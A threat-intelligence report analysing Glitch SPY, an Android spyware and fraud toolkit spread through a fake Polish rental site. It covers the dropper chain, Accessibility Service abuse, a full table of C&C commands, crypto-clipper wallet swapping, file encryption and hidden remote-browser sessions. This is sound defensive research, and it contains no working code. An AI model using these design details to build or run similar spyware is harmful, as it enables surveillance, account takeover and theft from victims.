<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Glitch SPY heavily abuses the Android Accessibility Service to auto-grant permissions, extract on-screen content, perform taps and gestures, and operate the device with minimal user interaction.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>Glitch SPY supports extensive surveillance and theft capabilities, including screen streaming, screenshots, keylogging, SMS theft, contact and call log collection, file access, audio and camera capture, clipboard monitoring, location tracking, and remote browser control.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The malware includes a crypto-clipper that swaps copied wallet addresses across multiple formats (ETH/EVM, TRON, Bitcoin legacy, and Bech32) with attacker-controlled addresses, directly targeting cryptocurrency users.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The exposed Glitch SPY panel confirms the presence of modules such as Agents, Viewer, Builder, Cryptor, Dropper, Settings, and Payloads.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The Builder module indicates that threat actors can generate customized Android payloads with configurable names, package IDs, icons, feature modules, decoy WebView URLs, and optional Telegram alerting.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Overview<strong></strong></h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><a href="https://cyble.com/resources/research-reports/">Cyble Research and Intelligence Labs</a> identified an emerging Android malware family tracked as <strong>Glitch SPY</strong>, based on branding observed on an exposed command-and-control (C&amp;C) admin panel. The <a href="https://cyble.com/knowledge-hub/what-is-malware/">malware</a> was distributed via the suspicious domain tutaj-dompl[.]com, which appears to be a Polish apartment and house rental platform.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The website advertises verified apartments, viewing reservations, direct contact with property owners, and a simplified rental process without broker commissions. Its primary objective is to encourage users to download an Android APK to reserve apartment viewings, check availability, save listings, and receive confirmation updates.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121434,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-2-Fake-Tutaj-Dom-distribution-website.png" alt="" class="wp-image-121434"><figcaption class="wp-element-caption"><em>Figure 2 - Fake Tutaj Dom distribution website</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The lure is socially plausible, as users searching for rental properties may install a dedicated application to secure viewing slots or communicate with property owners. Based on the Polish-language lure and rental-themed distribution website, the activity appears to be Poland-focused, particularly targeting users searching for rental properties in Poland.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Once installed, the application displays the rental-themed website as a decoy interface, while the Glitch SPY payload runs in the background and initiates malicious activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>During analysis, the malware was observed communicating with the C&amp;C domain sportypointsrewards[.]com. Accessing the C&amp;C infrastructure revealed an admin login panel branded as Glitch SPY, which prompted for a username and password. We also identified an additional Glitch SPY admin panel URL gich[.]etherraffleexchange[.]us.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>However, no communicating APK associated with that second panel has been recovered at the time of analysis.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121437,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-3-Glitch-SPY-admin-login-panel.png" alt="" class="wp-image-121437"><figcaption class="wp-element-caption"><em>Figure 3 - Glitch SPY admin login panel</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Before authentication, the admin panel exposed a partial view of the Glitch SPY dashboard, revealing multiple modules, including:</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121438,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-4-%E2%80%93-Glitch-SPY-dashboard.png" alt="Figure 4 – Glitch SPY dashboard" class="wp-image-121438"><figcaption class="wp-element-caption"><em>Figure 4 – Glitch SPY dashboard</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:list --></p>
<ul class="wp-block-list"><!-- wp:list-item -->
<li>The <strong>Agents</strong> module appears to be designed to list infected devices and search for victims by name, agent ID, device details, or IP address.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Viewer</strong> module provides live screen viewing and remote-control operations, including remote input, pattern unlock, screen streaming, screenshots, screen-reader extraction, Android navigation controls, camera access, audio capture, keylogging, clipper operations, file management, SMS access, contacts, call logs, location tracking, installed applications, device accounts, system information, remote browser interaction, shell access, permission prompting, Device Admin control, biometric prompt suppression, app hiding, and self-uninstall functionality.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Builder</strong> module allows TA to configure and compile Android payloads using Gradle on the server. Configurable options include the application name, package name, launcher icon, version information, foreground notification text, decoy WebView URL, feature modules, Device Admin activation, and Telegram alert settings.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Cryptor</strong> module is present but marked as “Coming soon,” suggesting planned support for APK repacking, fresh signing, payload noise under assets, and mirror obfuscation layers while preserving installability.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Dropper</strong> module appears to allow TA to wrap a generated payload inside a separate dropper APK, supporting staged delivery.</li>
<p><!-- /wp:list-item --></p>
<p><!-- wp:list-item --></p>
<li>The <strong>Payloads</strong> module appears to store APKs generated by the Builder and Dropper modules.</li>
<p><!-- /wp:list-item --></p></ul>
<p><!-- /wp:list --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Once the user installs the downloaded application, it functions as a dropper and presents a fake update-style screen to guide the victim through the required installation and permission steps. The dropper first attempts to convince the user to allow installation from unknown sources. After this permission is granted, the Glitch SPY payload is installed on the device.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After installation, Glitch SPY prompts the user to enable the Android Accessibility Service. Once Accessibility access is enabled, the malware abuses this capability to automate permission grants and continue its post-installation activity with minimal user interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This allows Glitch SPY to obtain the permissions required for remote control, screen capture, keylogging, SMS theft, file access, camera and microphone surveillance, clipboard monitoring, and other intrusive operations.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>A detailed technical analysis of these capabilities is provided in the following section.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Technical Analysis</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The application downloaded from the fraudulent website was identified as the Brokewell Android Loader, based on its package naming pattern and its use of techniques designed to circumvent Android permission restrictions. CRIL first documented the Brokewell Android Loader and the Brokewell Banking Trojan in April 2024.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After installation, the loader presents a fake update-themed screen and prompts the user to allow installation of applications from unknown sources. Once the user grants this permission, the loader installs the Glitch SPY payload on the device.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121441,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-5-Glitch-SPY-installation-activity.png" alt="" class="wp-image-121441"><figcaption class="wp-element-caption"><em>Figure 5 - Glitch SPY installation activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Abuse of Android Accessibility Service</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Following installation, Glitch SPY immediately attempts to obtain Android Accessibility Service access, which is required for several of its core capabilities. After the user enables the Accessibility Service, the malware abuses this permission to observe UI elements, interact with on-screen content, perform gestures, click buttons, extract visible text, and automate permission approval flows with limited user interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The malware includes logic for remote tap and swipe actions, screen-reader text extraction, gesture dispatch, automated permission granting, keyguard interaction, PIN/password entry, pattern unlock assistance, biometric prompt handling, and force-stop or uninstall interruption. This makes Accessibility the primary mechanism Glitch SPY uses to support TA-driven control of the infected device and to continue post-installation activity.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Command and Control</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After installation, Glitch SPY starts its core C&amp;C service and establishes a persistent WebSocket-based communication channel with the command-and-control server. The malware Glitch SPY refers to the device as an agent, assigns an agent_id to the infected device, collects device metadata, and sends an initial hello message along with deviceInfo to register the infected device with the C&amp;C panel. The server responds with a hello_ack, after which the implant maintains connectivity using heartbeat and ping logic.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The implant executes the requested action locally and returns the output through response messages such as command_result, screen_frame, sms_data, contacts_data, file_list, and browser_command_result.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The complete list of commands is provided below.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:table --></p>
<figure class="wp-block-table">
<table class="has-fixed-layout">
<tbody>
<tr>
<td><strong>Command</strong></td>
<td><strong>Feature</strong></td>
</tr>
<tr>
<td>request_screen_stream</td>
<td>Starts live screen streaming from the infected device to the C&amp;C panel.</td>
</tr>
<tr>
<td>stop_screen_stream</td>
<td>Stops the active screen-streaming session.</td>
</tr>
<tr>
<td>request_screenshot</td>
<td>Captures a screenshot of the infected device screen and returns it to the C&amp;C.</td>
</tr>
<tr>
<td>request_screen_reader_text</td>
<td>Uses Accessibility to extract visible on-screen text and send it to the C&amp;C Server.</td>
</tr>
<tr>
<td>request_sms</td>
<td>Collects SMS messages from the infected device.</td>
</tr>
<tr>
<td>send_sms</td>
<td>Sends an SMS message from the infected device using TA provided content.</td>
</tr>
<tr>
<td>request_contacts</td>
<td>Extracts the victim’s contact list.</td>
</tr>
<tr>
<td>request_call_log</td>
<td>Collects call history from the infected device.</td>
</tr>
<tr>
<td>request_location</td>
<td>Retrieves the device location.</td>
</tr>
<tr>
<td>request_app_list</td>
<td>Enumerates installed applications on the device.</td>
</tr>
<tr>
<td>request_device_accounts</td>
<td>Collects account information configured on the Android device.</td>
</tr>
<tr>
<td>request_system_info</td>
<td>Collects device metadata</td>
</tr>
<tr>
<td>request_file_list</td>
<td>Lists files and folders from a specified path on the device.</td>
</tr>
<tr>
<td>request_file_download</td>
<td>Downloads a selected file from the infected device to the C&amp;C.</td>
</tr>
<tr>
<td>request_folder_zip_download</td>
<td>Compresses a folder and prepares it for download</td>
</tr>
<tr>
<td>file_upload_start</td>
<td>Starts a file upload session.</td>
</tr>
<tr>
<td>file_upload_chunk</td>
<td>Transfers a chunk of a file being uploaded to the infected device.</td>
</tr>
<tr>
<td>file_upload_finish</td>
<td>Finalizes the file upload operation on the device.</td>
</tr>
<tr>
<td>file_upload_cancel</td>
<td>Cancels an active file upload session.</td>
</tr>
<tr>
<td>file_mkdir</td>
<td>Creates a new directory on the infected device.</td>
</tr>
<tr>
<td>file_rename</td>
<td>Renames a selected file or folder on the device.</td>
</tr>
<tr>
<td>file_run</td>
<td>Opens or executes a selected file on the infected device.</td>
</tr>
<tr>
<td>file_zip_here</td>
<td>Creates a ZIP archive next to the selected folder on the device.</td>
</tr>
<tr>
<td>file_crypto_lock</td>
<td>Encrypts a selected file, likely producing a .enc file and removing the original.</td>
</tr>
<tr>
<td>file_crypto_unlock</td>
<td>Decrypts a previously encrypted .enc file.</td>
</tr>
<tr>
<td>request_offline_keylog</td>
<td>Retrieves offline keylog data from the device.</td>
</tr>
<tr>
<td>start_keylogger</td>
<td>Starts keylogging</td>
</tr>
<tr>
<td>stop_keylogger</td>
<td>Stops the active keylogging module.</td>
</tr>
<tr>
<td>request_camera_stream</td>
<td>Starts camera streaming from the infected device.</td>
</tr>
<tr>
<td>stop_camera_stream</td>
<td>Stops the active camera stream.</td>
</tr>
<tr>
<td>start_audio</td>
<td>Starts audio capture from the infected device.</td>
</tr>
<tr>
<td>stop_audio</td>
<td>Stops audio capture.</td>
</tr>
<tr>
<td>start_clipboard_monitor</td>
<td>Starts monitoring the device clipboard.</td>
</tr>
<tr>
<td>stop_clipboard_monitor</td>
<td>Stops clipboard monitoring.</td>
</tr>
<tr>
<td>clipper_get_config</td>
<td>Retrieves the current crypto-clipper configuration from the device.</td>
</tr>
<tr>
<td>clipper_set_config</td>
<td>Pushes or updates clipper rules, likely including wallet replacement addresses.</td>
</tr>
<tr>
<td>clipper_inject_clipboard</td>
<td>Forces/injects clipboard content on the victim device.</td>
</tr>
<tr>
<td>execute_command</td>
<td>Executes a TA-provided shell command on the infected device.</td>
</tr>
<tr>
<td>remote_browser_start</td>
<td>Starts a remote browser session on the infected device.</td>
</tr>
<tr>
<td>remote_browser_stop</td>
<td>Stops the remote browser session.</td>
</tr>
<tr>
<td>remote_browser_navigate</td>
<td>Navigates the remote browser to a supplied URL.</td>
</tr>
<tr>
<td>remote_browser_click</td>
<td>Performs a click action inside the remote browser session.</td>
</tr>
<tr>
<td>remote_browser_text</td>
<td>Enter the TA-provided text into the remote browser.</td>
</tr>
<tr>
<td>remote_browser_swipe</td>
<td>Performs a swipe gesture inside the remote browser session.</td>
</tr>
<tr>
<td>remote_browser_key</td>
<td>Sends keyboard key actions to the remote browser, such as Enter, Backspace, Tab, or arrow keys.</td>
</tr>
<tr>
<td>remote_browser_js_fill</td>
<td>Fills fields in the remote browser using JavaScript-style automation.</td>
</tr>
<tr>
<td>remote_browser_clear_field</td>
<td>Clears a selected input field in the remote browser.</td>
</tr>
<tr>
<td>remote_browser_action</td>
<td>Performs a generic browser-side action, likely used for submit, back, reload, or similar UI actions.</td>
</tr>
<tr>
<td>remote_browser_set_mode</td>
<td>Switches the remote browser view mode, such as desktop/mobile mode.</td>
</tr>
<tr>
<td>remote_browser_fps</td>
<td>Adjusts the remote browser streaming or update frame rate.</td>
</tr>
<tr>
<td>tap_ui_submit</td>
<td>Attempts to tap a visible submit/OK/Done button or sends Enter to submit the current UI.</td>
</tr>
<tr>
<td>pattern_fetch</td>
<td>Retrieves a stored Android unlock pattern from the malware/device-side store.</td>
</tr>
<tr>
<td>pattern_store</td>
<td>Saves a TA-provided Android unlock pattern for later reuse.</td>
</tr>
<tr>
<td>pattern_clear_store</td>
<td>Clears the saved unlock pattern from storage.</td>
</tr>
<tr>
<td>pattern_auto_unlock</td>
<td>Uses a saved or provided pattern to attempt automatic device unlock.</td>
</tr>
<tr>
<td>credential_fetch</td>
<td>Retrieves a stored PIN/password credential value or credential state.</td>
</tr>
<tr>
<td>credential_manual_save</td>
<td>Saves a PIN/password credential provided by the TA on the device side.</td>
</tr>
<tr>
<td>credential_manual_save_unlock</td>
<td>Saves a supplied credential and immediately attempts to unlock the device with it.</td>
</tr>
<tr>
<td>credential_auto_unlock</td>
<td>Attempts to unlock the device automatically using a previously captured or saved credential.</td>
</tr>
<tr>
<td>credential_clear</td>
<td>Clears the stored PIN/password credentials from the malware’s storage.</td>
</tr>
<tr>
<td>prompt_permission_notifications</td>
<td>Opens or triggers the Android notification permission flow.</td>
</tr>
<tr>
<td>prompt_permission_storage</td>
<td>Opens or triggers the storage permission flow.</td>
</tr>
<tr>
<td>prompt_permission_location</td>
<td>Opens or triggers the location permission flow.</td>
</tr>
<tr>
<td>prompt_permission_battery</td>
<td>Opens the battery optimization exemption flow.</td>
</tr>
<tr>
<td>prompt_permission_all_files</td>
<td>Opens the “All files access” permission screen.</td>
</tr>
<tr>
<td>activate_device_admin</td>
<td>Launches or triggers Device Admin activation for the malware.</td>
</tr>
<tr>
<td>deactivate_device_admin</td>
<td>Attempts to remove Device Admin rights from the malware.</td>
</tr>
<tr>
<td>block_biometric</td>
<td>Enables/disables biometric prompt suppression to force PIN/password fallback.</td>
</tr>
<tr>
<td>wake_screen</td>
<td>Wake the victim's device screen.</td>
</tr>
<tr>
<td>lock_device</td>
<td>Locks the device screen</td>
</tr>
<tr>
<td>hide_screen</td>
<td>Hides the visible device screen from the victim's side</td>
</tr>
<tr>
<td>hide_app</td>
<td>Hides the malware application icon or disables its launcher component.</td>
</tr>
<tr>
<td>show_app</td>
<td>Restores the malware application launcher component.</td>
</tr>
<tr>
<td>self_uninstall</td>
<td>Attempts to uninstall the malware from the device.</td>
</tr>
<tr>
<td>uninstall_app</td>
<td>Attempts to uninstall a specified application from the device.</td>
</tr>
</tbody>
</table>
</figure>
<p><!-- /wp:table --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Screen Capture and Live Streaming</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY can remotely view the victim’s screen and interact with the device in near real time.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>When the TA issues the request_screen_stream command from the C&amp;C panel, the malware initiates its screen capture module and begins sending screen frames back to the server as screen_frame messages.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The TA’s panel includes options to control stream quality, FPS, and scale, indicating that the stream can be adjusted based on device state and network conditions.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121445,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-6-%E2%80%93-Screen-capture-Activity.png" alt="" class="wp-image-121445"><figcaption class="wp-element-caption"><em>Figure 6 – Screen capture Activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>For a one-time capture, the TA can use request_screenshot, which instructs the malware to capture the device's screen and return the image to the C&amp;C. When visual streaming is unavailable or insufficient, the user can use request_screen_reader_text, which abuses the Android Accessibility Service to extract visible text from the active screen.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This allows the malware to collect sensitive information displayed in banking applications, <a href="https://cyble.com/knowledge-hub/top-secure-messaging-apps-encrypted-chats/">messaging apps</a>, OTP prompts, browser pages, and authentication screens.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>In addition to visual monitoring, this capability supports hands-on fraud activity. By combining live screen streaming with Accessibility-based remote input, the TA can observe the victim’s device, understand the active application context, and perform follow-up actions such as tapping buttons, entering text, navigating screens, or capturing credentials.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>File Manager and File Encryption</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY includes a remote file manager that allows the TA to browse, retrieve, modify, and manipulate files on the infected device. When the TA sends request_file_list, the malware lists files and folders from the requested directory and returns the results to the C&amp;C as a file listing.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If the TA selects a file for exfiltration, the malware reads it and sends it back to the server. For folders, the malware compresses the selected directory before exfiltration, making it easier for the TA to retrieve multiple files.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY also includes file encryption and decryption functionality through the file_crypto_lock and file_crypto_unlock commands. When file_crypto_lock is issued, the malware encrypts the selected file using AES/GCM/NoPadding, creates an encrypted .enc version, and removes the original plaintext file.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The encrypted file uses the FMENC1 header followed by cryptographic metadata and ciphertext. If standard deletion of the plaintext file fails, the malware uses a secure-delete routine that overwrites the file with random data, truncates it, syncs the file descriptor, and then attempts to delete it.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121447,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-7-%E2%80%93-File-encryption-logic.png" alt="" class="wp-image-121447"><figcaption class="wp-element-caption"><em>Figure 7 – File encryption logic</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Although file encryption could be abused for extortion, the analyzed sample does not confirm an automated mass-encryption routine, ransom note, payment workflow, or victim-facing ransom screen.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Crypto Clipper Functionality</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The crypto-clipper module is designed to monitor clipboard activity on the infected device and replace copied <a href="https://cyble.com/blog/cryptocurrency-firms-being-raided-by-cybercriminals/">cryptocurrency</a> wallet addresses with TA-configured addresses.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The module supports multiple wallet formats, including ETH/EVM addresses beginning with 0x, TRON/TRX addresses beginning with T, Bitcoin legacy addresses beginning with 1 or 3, and Bitcoin Bech32 addresses beginning with bc1q or bc1p. The code also includes URI-style prefixes such as bitcoin:, ethereum:, erc20:, tron:, bsc:, matic:, polygon:, arbitrum:, optimism:, base:, and ton:, indicating that the malware can detect wallet addresses copied in both plain-text and URI-prefixed formats.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121453,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-8-%E2%80%93-Malware-implemented-crypto-wallet-address-pattern-match.png" alt="Figure 8 – Malware implemented crypto wallet address pattern match" class="wp-image-121453"><figcaption class="wp-element-caption"><em>Figure 8 – Malware implemented crypto wallet address pattern match</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>When the TA issues the start_clipboard_monitor command, Glitch SPY begins tracking clipboard changes on the infected device. Before performing any replacement, the clipper module is enabled in the configuration.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If replacement is active, the malware reads the current clipboard content, extracts text from available clipboard items, removes null bytes and hidden formatting characters, normalizes whitespace, and attempts to identify a supported cryptocurrency wallet address.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>If a valid wallet address is detected, Glitch SPY selects a configured replacement address from the same cryptocurrency family and ensures it is different from the victim-copied address. It then updates the clipboard using Android’s ClipboardManager.setPrimaryClip() API, replacing the victim’s original wallet address with the attacker-controlled value.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>After the replacement, the malware reports the event to the C&amp;C server, including the original address, replacement address, and detected cryptocurrency type, such as ETH/EVM, TRX, or BTC.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121454,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-9-Crypto-clipper-clipboard-replacement-logic.png" alt="" class="wp-image-121454"><figcaption class="wp-element-caption"><em>Figure 9 - Crypto clipper clipboard replacement logic</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><strong>Remote Browser Capability</strong></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY’s remote browser capability allows the TA to open and control a browser session directly on the infected device. The malware receives a URL from the C&amp;C server and loads it inside a WebView on the victim’s device. It also supports switching between mobile and desktop browsing modes, allowing the TA to control how websites render during the session.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The browser session runs in a hidden off-screen window, keeping it active without alerting the victim. After the browser session is initialized, the malware reports the session status, loaded URL, browsing mode, and window details back to the C&amp;C server. This allows the TA to confirm that the browser session is active and ready for interaction.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121455,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-10-Remote-browser-activity.png" alt="" class="wp-image-121455"><figcaption class="wp-element-caption"><em>Figure 10 - Remote browser activity</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The TA can further control the session using commands to navigate to URLs, click page elements, enter text, swipe through pages, send keyboard actions, and fill or clear web form fields.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>When combined with screen streaming, keylogging, screen-reader extraction, clipboard monitoring, and Accessibility-based input, the remote browser capability provides a complete workflow for web-based account takeover and transaction manipulation from the infected device itself.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:image {"id":121457,"sizeSlug":"full","linkDestination":"none","align":"center"} --></p>
<figure class="wp-block-image aligncenter size-full"><img src="https://cyble.com/wp-content/uploads/2026/06/Figure-11-%E2%80%93-Commands-to-control-WebView-sessions.png" alt="" class="wp-image-121457"><figcaption class="wp-element-caption"><em>Figure 11 – Commands to control WebView sessions</em></figcaption></figure>
<p><!-- /wp:image --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The feature can let attacker-controlled web activity originate from the victim’s own device rather than from external attacker infrastructure.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>This means the attacker's web activity originates from the victim's IP, with the victim's cookies and any active authenticated sessions intact — making it harder for banks or crypto platforms to flag the login as suspicious.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>In fraud scenarios, this may allow attackers to interact with login pages, financial portals, cryptocurrency services, email accounts, or other web applications from the victim’s environment.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:heading --></p>
<h2 class="wp-block-heading">Conclusion</h2>
<p><!-- /wp:heading --></p>
<p><!-- wp:paragraph --></p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Glitch SPY is a capable, actively developing Android threat combining surveillance, remote control, financial fraud, and account takeover within a single platform.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>Its use of the established Brokewell loader for delivery, its abuse of the Accessibility Service to automate permission grants after a single user action, and its Builder, Dropper, and payload-management modules indicate a TA investing in a reusable framework rather than a one-off campaign.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>The Builder's per-payload configuration options (custom name, icon, package ID, and decoy WebView URL) mean retargeting for a new region or lure requires no code changes.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
<p>While the current activity appears targeted at users searching for rental properties in Poland, one recovered APK and two identified C&amp;C panel URLs suggest early-stage distribution. The "Coming soon" Cryptor module and active panel development indicate the platform is still expanding.</p>
<p><!-- /wp:paragraph --></p>
<p><!-- wp:paragraph --></p>
